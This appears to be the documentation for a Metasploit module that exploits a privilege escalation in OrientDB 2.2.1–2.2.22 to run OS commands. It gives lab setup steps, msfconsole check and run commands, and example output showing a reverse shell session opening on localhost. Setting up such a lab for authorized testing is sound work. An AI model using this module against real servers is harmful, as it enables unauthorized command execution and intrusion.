Ricardo Almeida
1.7 KiB
This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
All versions from 2.2.1 up to 2.2.22 should be vulnerable.
The module is based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3318
Vulnerable Application
OrientDB 2.2.1 <= 2.2.22
Installation
Download a vulnerable OrientDB version here: http://orientdb.com/download-previous/
$ wget http://orientdb.com/download.php?file=orientdb-community-2.2.20.zip&os=multi
$ unzip orientdb-community-2.2.20.zip
$ chmod 755 bin/*.sh
$ chmod -R 777 config
$ cd bin
$ ./server.sh
References for running OrientDB
http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Installation.html http://orientdb.com/docs/2.0/orientdb.wiki/Tutorial-Run-the-server.html
References for vulnerability
https://blogs.securiteam.com/index.php/archives/3318 http://www.palada.net/index.php/2017/07/13/news-2112/ https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017
Verification Steps
- Start
msfconsole use exploit/multi/http/orientdb_execset rhost <RHOST>set target <TARGET_NUMBER>set workspace <WORKSPACE>check- Verify if the OrientDB instance is vulnerable
run- Verify you get a session
Example Output
[LHOST:127.0.0.1][Workspace:default][Jobs:0][Sessions:0][/Users/vibrio] exploit(orientdb_exec) > run
[*] [2017.07.18-15:55:47] Started reverse TCP handler on 127.0.0.1:37331
[*] [2017.07.18-15:55:49] 127.0.0.1:2480 - Sending payload...
[*] Command shell session 1 opened (127.0.0.1:37331 -> 127.0.0.1:46594) at 2017-07-18 15:55:49 +0100